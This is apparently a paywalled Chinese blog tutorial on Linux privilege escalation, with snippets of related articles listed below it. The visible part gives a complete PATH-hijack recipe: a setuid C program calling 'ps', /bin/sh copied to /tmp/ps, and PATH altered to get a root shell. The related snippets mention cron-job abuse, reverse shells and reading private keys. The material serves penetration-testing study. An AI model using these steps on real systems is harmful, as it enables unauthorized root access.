提权—Linux 定时任务&环境变量&数据库

最新推荐文章于 2023-11-06 10:11:20 发布
VIP文章 最新推荐文章于 2023-11-06 10:11:20 发布
阅读量2.8k 收藏 6
点赞数 4
分类专栏: # 权限提升 文章标签: linux 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qi_SJQ_/article/details/122782532
版权

在这里插入图片描述

Linux提权环境变量安全-(aliyun,本地):

前提:需要配合SUID进行环境变量提权且是本地用户环境下(因此该方法比较难实现,鸡肋)

提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。

//demo.c文件
#include<unistd.h>
void main(){
   
  setuid(0);
  setgid(0);
  system("ps");
}

gcc demo.c -o shell  //手写一个c语言文件,并上传编译为shell文件
cp /bin/sh /tmp/ps    //复制到目录
export PATH=/tmp:$PATH  //导入环境变量,类似windows配环境变量,直接命令下就能执行某文件,kali里各种工具都是如此
./shell  //执行当前目录shell文件
id

在这里插入图片描述
777:所有人都有读写执行权限。

在这里插入图片描述

Linux 提权本地定时任务安全-Aliyun

了解下定时任务命令:

最低0.47元/天 解锁文章
暮w光
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第64天:权限提升-Linux定时任务&环境变量&数据库1
08-03
1.提权环境,信息收集(SUID,定时任务,可能漏洞,第三方服务应用等) 2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本) 3.本地 se
权限提升-Linux定时任务&环境变量&数据库
weixin_44805159的博客
10-13 280
#案例1.Linux提权本地环境变量安全-本地配合SUID进行环境变量提权-本地用户环境手调用文件-编译-复制文件-增加环境变量-执行触发 gcc demo.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH ./shell id demo.c #include<unistd.h> void main() { setuid(0); setgid(0); system("ps"); } 路径问题 利用计划任
linnx环境变量提权
weixin_43227251的博客
05-31 343
linnx环境变量提权 这个手法平时使用有点鸡肋,但是还是分享一下 前提是管理员要配置了suid权限的目录或文件 现在我们的当前目录是/home/hack/script,我们将在当前目录下创建一个srcipt目录。然后cd到script目录中,编一个简单的c程序来调用系统二进制文件的函数。 pwd mkdir script cd /script vim demo.c #include<unistd.h> void main() { setuid(0); setgid(0); syst
Vulnhub-Gemini-Pentest-v1
weixin_44805159的博客
04-18 302
其中date命令没有绝对路径,我们可以使用Linux环境变量提权,使用listinfo命令去执行我们编译的恶意date脚本,从而达到提权的目的。尝试读取shadow文件失败,读取root和gemini1下的bash_history失败,最后尝试读取/home/gemini1下的私钥文件。以上信息说明此程序为:这是一个内部web应用程序,旨在让员工查看他们的个人资料详细信息,并允许他们将自己的详细信息导出为PDF格式。功能点不多,登录退出,修改个人信息,导出文件等功能。将私钥文件保存为id_rsa文件。
Linux后门
收集盒 Book box
04-18 576
===Linux入侵检测===  0. 断网 1. history 查看最近命令执行历史 2. /var/log/* 日志检查 3. lastlog last 查看登录信息 4. netstat -anp 查看可疑连接 5. lsmod 查看加载的模块 6. ps -awuxf 查看可疑进程 7. /etc/passwd crontab shell ssh fstab配置文件检查
靶场:CORROSION 1 攻击流程
qq_51950323的博客
05-08 237
一个用来提权的easysysinfo.c文件,编译到/home/randy/tools/easysysinfo中,利用sudo执行成功提权。确认可以利用后,bash脚本反弹shell,先在本机监听端口。在/var/backups目录下找个一个疑似账户备份的压缩包。得到了file参数,将参数值设为日志文件目录,尝试访问日志。再扫描blog-post的目录下发现一个php文件。尝试在ssh连接时入php代码到日志文件中。打开php文件,需要一个参数,根据提示。访问一下扫到的内容,发现了。
Linux下Oracle设置定时任务备份数据库的教程
01-10
数据库的字符集必须和Linux下设置的环境变量一致,不然会有乱码。 以下两个sql语句都可以查到: select * from nls_database_parameters t where t.parameter='NLS_CHARACTERSET'; select * from v$nls_parameters ...
12.系统和数据库备份、恢复策略.doc
03-11
数据信息备份 在数据库服务器上提供了备份脚本,/home/oracle/backup/strbackup.sh、/hom e/oracle/backup/databackup.sh,通过linux计划任务,每周一凌晨备份一次, 具体时间可设置,默认7天,保留最近20次备份。...
Linux指令一周通 (技术图书大系).azw3
05-22
6.15 export指令:设置或显示环境变量 6.16 fbset指令:设置帧缓冲区 6.17 grpconv指令:开启群组的投影密码 6.18 grpunconv 指令:关闭群组的投影密码 6.19 hwclock指令:显示与设定硬件时钟(rtc) 6.20 insmod...
Linux 定时任务提权
大河之犬的博客
06-19 1730
定时任务(cron job)是Linux系统中的一个守护进程,用于调度重复任务,通过配置crontab可以让系统周期性地执行某些命令或者脚本。cron 是 Linux 系统中最为实用的工具之一,但是也可能被黑客用于提权操作。由于cron通常以root特权运行,如果我们可以修改其调度的任何脚本或二进制文件,那么便可以使用root权限执行任意代码。
LINUX提权之计划任务提权
小王的储物间
12-14 771
总结一下本文的知识点,讲了计划任务提权常用的两种方法以及漏洞探针的安装及使用,有兴趣的小伙伴可以自己尝试去搭建靶机提权,如果喜欢本文不妨一键三连。
第104天:权限提升-Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化
qq_46081990的博客
06-22 375
知识点总结 #知识点: 1、Linux提权-定时任务 2、Linux提权-环境变量 3、Linux提权-权限配置不当 4、Linux提权-数据库自动化 #系列内容: 内核,数据库,第三方服务,SUID&GUID,定时任务环境变量,SUDO,权限不当等 脏牛漏洞(CVE-2016-5195) Dirty Pipe(CVE-2022-0847) SUDO(CVE-2021-3156) Polkit(CVE-2021-4034) #截至目前思路点总结如下: 1.提权方法有部分适用在不同环境,当然也有
Linux权限
niqiu320的博客
05-24 823
Linux提权大全 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 Linux提权信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
Linux提权方法总结
最新发布
Ays.Ie的博客
11-06 2514
Linux提权方式总结
操作系统权限提升(二十)之Linux提权-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 928
先准备一个SUID文件或者权限为xx7的文件,让低权限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务提权是因为权限配置不当,计划任务以root权限运行,低权限的用户可以修改计划任务的文件,从而被攻击者利用,导致提权Linux计划任务命令如下。linux文件权第一部分是该文件的拥有者所拥有的权限,第二部分是该文件所在用户组的用户所拥有的权限,最后一部分是其他用户所拥有的权限。
Kali学习之从入门到入狱(三)
weixin_43457608的博客
11-04 4173
Kali学习之从入门到入狱致谢开篇1 Linux 常见目录2 Linux基础命令以及常见用法2.0 环境变量2.1 apt-get 安装2.2 ls ll 和 alias2.3 花式grep3 shell基础4 脚本应用4.1 监测进程并重启脚本5 docker基础以及靶场搭建5.1 docker基础5.2 docker靶场搭建 致谢 大家的催更看到了,我没想到过年那段时间抱着玩玩的心态的文章会受到大家的喜欢。最近在准备找工作,更新的话随缘吧,等稳定下来一个月至少更新一篇。 开篇 相信看到这里的同学都
linux添加定时任务crond
程序员的博客
06-01 566
1.查看定时任务是否在运行 service crond status 2.编辑定时任务文件 ### 第一种 编辑/var/spool/cron下对应用户的cron文件 crontab -e ### 第二种 编辑crontab vim /etc/crontab ### 格式 * * * * * command 分 时 天 月 星期 命令 ### 查看定时任务 crontab -l ...
Linux crontab定时任务的使用
ez scope
10-29 2036
本文叙述系统cron定时作业调度程序及其crontab工具,简单使用。
linux定时任务提权
05-25
Linux定时任务通常使用crontab命令进行配置,而对于需要提权的任务,可以使用sudo命令进行提权。以下是一些步骤: 1. 打开终端,输入sudo crontab -e命令来编辑root用户的定时任务。 2. 添加需要执行的命令,例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值